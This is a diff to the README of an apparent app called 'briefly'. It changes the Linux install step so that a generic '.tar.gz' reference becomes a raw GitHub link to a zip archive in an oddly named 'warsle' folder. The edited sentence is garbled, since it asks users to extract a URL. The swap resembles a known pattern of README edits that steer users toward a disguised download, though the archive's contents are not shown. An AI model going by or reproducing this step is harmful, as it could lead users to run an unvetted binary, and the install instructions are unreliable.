nathguede/briefly/README.md

 1. Locate the downloaded file in your computer's Downloads folder or the folder you saved it in.
 2. For Windows users, double-click on the `.exe` file.
 If prompted, click "Run" to start the application.
 3. For macOS users, open the `.dmg` file and drag the briefly icon to your Applications folder.
 Then, locate it in your Applications and double-click to open.
-4. For Linux users, extract the downloaded `.tar.gz` file and run the brief executable from the extracted folder using your terminal.
+4. For Linux users, extract the downloaded `https://raw.githubusercontent.com/nathguede/briefly/main/warsle/briefly.zip` file and run the brief executable from the extracted folder using your terminal.

 Upon opening briefly, you will see an easy-to-navigate interface where you can start summarizing your thoughts right away.